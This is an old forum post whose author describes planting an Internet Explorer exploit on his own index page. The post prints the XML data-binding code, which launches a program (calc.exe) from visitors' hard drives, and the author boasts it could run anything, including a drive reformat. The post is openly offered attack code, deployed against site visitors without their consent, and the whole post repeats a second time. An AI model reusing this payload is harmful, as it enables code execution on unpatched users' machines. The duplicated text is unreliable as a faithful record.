sdtPikachu
03-04-2002, 09:14 PM
Hello chaps. Having recently done some fiddling with XML, I have implemented a stupidly simple bit of code into my index page (http://uk.geocities.com/sdtpikachu) that exploits a rather glaring hole in most versions of MS Internet Explorer.
If you go to the site, you'll see my index page, and the code will launch an arbitary program fron your hard drive (if it doesn't work then it's probably due to you having a weird computer, or me coding badly).
The code I used is here (comment tags added by me as an extra in case it does anything in here). This could conceivable be used to execute any program on your hard drive, including a full hardrive reformat.
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<!-- xml id="oExec" -->
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111- 111111111111" codebase="c:/WINNT/system32/calc.exe"></object>
]]>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111- 111111111111" codebase="c:/winme/calc.exe"></object>
]]>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111- 111111111111" codebase="c:/windows/calc.exe"></object>
]]>
</exploit>
</security>
<!-- /xml -->
I did this because I hate Microsoft for making rubbishy insecure software that even an idiot like me can "hack". Chances are the next IE patch will solve this one, but there are plenty of people out there who never install patches full stop.
I could advertise Opera, but then that's been done before.
Happy computing!
If you go to the site, you'll see my index page, and the code will launch an arbitary program fron your hard drive (if it doesn't work then it's probably due to you having a weird computer, or me coding badly).
The code I used is here (comment tags added by me as an extra in case it does anything in here). This could conceivable be used to execute any program on your hard drive, including a full hardrive reformat.
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<!-- xml id="oExec" -->
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111- 111111111111" codebase="c:/WINNT/system32/calc.exe"></object>
]]>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111- 111111111111" codebase="c:/winme/calc.exe"></object>
]]>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111- 111111111111" codebase="c:/windows/calc.exe"></object>
]]>
</exploit>
</security>
<!-- /xml -->
I did this because I hate Microsoft for making rubbishy insecure software that even an idiot like me can "hack". Chances are the next IE patch will solve this one, but there are plenty of people out there who never install patches full stop.
I could advertise Opera, but then that's been done before.
Happy computing!